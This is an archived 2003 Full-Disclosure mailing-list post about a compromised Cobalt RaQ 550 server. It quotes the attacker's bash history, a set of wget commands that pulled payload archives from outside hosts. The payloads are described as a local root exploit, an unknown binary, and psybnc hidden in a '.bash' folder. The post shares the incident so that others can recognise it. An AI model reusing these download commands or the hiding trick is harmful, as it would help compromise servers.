[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] raq 550 compromised

To: full-disclosure@lists.netsys.com
Subject: [Full-Disclosure] raq 550 compromised
From: "adf--at--Code511.com" <adf@code511.com>
Date: Tue, 7 Oct 2003 03:37:24 +0200

sorry for the "cross-post", I just saw this message on cobalt-security mailing list today:

an user got his raq 550 compromised and he posted some bash history he found:

-wget www.ps-lov.us/pizda.tgz
:unknown binaries (yet?) named "mumu"

-wget snow.prohosting.com/muiemuie/p.tar.gz
:Linux kernel ptrace/kmod local root exploit from ipsec

-wget snow.prohosting.com/muiemuie/p.tgz
: it will decompress psybnc in a hidden folder (.bash)

-wget snow.prohosting.com/muiemuie/km3.tgz ----->(file offline)
-wget 65.113.119.133/muiemuie/km3.tgz     ----->(file offline)

anyone seen pizda or mumu ?

if you interested in all details of the post: http://list.cobalt.com/pipermail/cobalt-security/2003-October/ 008607.html

-deepquest

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Follow-Ups:
- RE: [Full-Disclosure] raq 550 compromised
  - From: "Bojan Zdrnja" <Bojan.Zdrnja@LSS.hr>

References:
- RE: [Full-Disclosure] RE: [Troll-Disclosure] Has Verisign time ar rived ?
  - From: Joshua Thomas <JThomas@poweronemedia.com>

Prev by Date: [Full-Disclosure] Weak response from RH
Next by Date: RE: [Full-Disclosure] raq 550 compromised
Previous by thread: RE: [Full-Disclosure] RE: [Troll-Disclosure] Has Verisign time ar rived ?
Next by thread: RE: [Full-Disclosure] raq 550 compromised
Index(es):
- Date
- Thread